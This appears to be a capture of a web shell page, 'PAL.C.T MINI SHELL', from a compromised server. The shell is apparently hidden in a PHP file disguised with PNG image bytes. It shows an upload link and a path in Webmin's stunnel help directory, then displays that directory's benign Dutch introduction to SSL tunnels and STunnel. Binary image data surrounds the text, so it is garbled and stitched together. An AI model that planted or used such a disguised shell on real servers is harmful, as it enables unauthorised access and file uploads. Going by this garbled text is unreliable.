php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.nl.auto.html

<header> Inleiding tot SSL-tunnels </header> SSL is een protocol voor het versleutelen van gegevens in een TCP-verbinding terwijl deze over het netwerk reist. Het is oorspronkelijk ontwikkeld om het verkeer tussen webbrowsers en servers te beschermen, maar kan worden gebruikt om elk soort gegevensstroom te coderen die normaal via het TCP-protocol zou worden verzonden. <p> Dankzij het SSL-protocol kunnen clients en servers zichzelf bij elkaar verifiëren, zodat een client er zeker van kan zijn dat deze echt verbinding maakt met de host die hij denkt te zijn. Dit wordt gedaan met behulp van certificaten die zijn uitgegeven door een door de klant erkende certificeringsinstantie (zodat ze kunnen worden geverifieerd) en die zijn gekoppeld aan een bepaalde hostnaam. Zonder certificaten kan een aanvaller een SSL-verbinding omleiden naar zijn eigen server en gevoelige informatie vastleggen van een client die denkt dat deze met de echte server praat. <p> Alle gegevens die ongecodeerd over het internet reizen, kunnen worden vastgelegd en gelezen door een aanvaller met toegang tot een van de netwerken waar het doorheen gaat. Zelfs gegevens die tussen een client- en serversysteem op een LAN reizen, kunnen gemakkelijk meeluisteren. Wanneer u verbinding maakt met een telnet-, FTP- of POP3-server, wordt uw wachtwoord via het netwerk verzonden en kan het dus worden vastgelegd door een aanvaller. <p> SSL kan worden gebruikt om gegevens in dit soort situaties te beschermen, maar alleen als zowel de client als de server dit ondersteunen. De meeste webbrowsers en e-mailclients kunnen SSL-gecodeerde HTTP-, POP3- en IMAP-verbindingen maken, maar niet alle web- en POP3-servers kunnen deze accepteren. Met name POP3 is moeilijk te beschermen, omdat de standaardserver die bij de meeste Unix-systemen wordt geleverd helemaal geen SSL ondersteunt. Gelukkig is er echter een oplossing - STunnel. <p> STunnel is een eenvoudig programma dat een niet-versleutelde verbinding omzet in een SSL-versleutelde verbinding. Het is meestal ingesteld om te worden uitgevoerd vanaf een superserver zoals inetd of xinetd, en vervolgens een ander programma uit te voeren, zoals de POP3-server die SSL niet ondersteunt. Door dit ontwerp kan het elke server beschermen die normaal wordt uitgevoerd tegen inetd, zoals telnet-, NNTP- en IMAP-servers. <p> Niet alle servers kunnen echter nuttig worden beschermd met codering, omdat er geen client bestaat om ze in SSL-modus te gebruiken. Ik heb bijvoorbeeld nog nooit gehoord van een telnet- of FTP-client die SSL kan gebruiken, omdat het algemene SSH-pakket al versleutelde externe aanmeldingen en bestandsoverdrachten toestaat. <p> Deze Webmin-module maakt het eenvoudig om superserverservices met STunnel in te stellen om een serverprogramma te starten. Hoewel dit handmatig kan worden gedaan met behulp van de module Internet Services, is deze specifiek ontworpen voor het instellen en configureren van STunnel. Het detecteert automatisch of je inetd en / of xinetd hebt geïnstalleerd, leest hun configuraties om te controleren op bestaande SSL-tunnels en voegt ze toe wanneer je een nieuwe tunnel maakt. Als beide zijn geïnstalleerd, worden nieuwe SSL-tunnels toegevoegd aan de xinetd-configuratie, omdat het naar mijn mening de superieure van de twee is. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`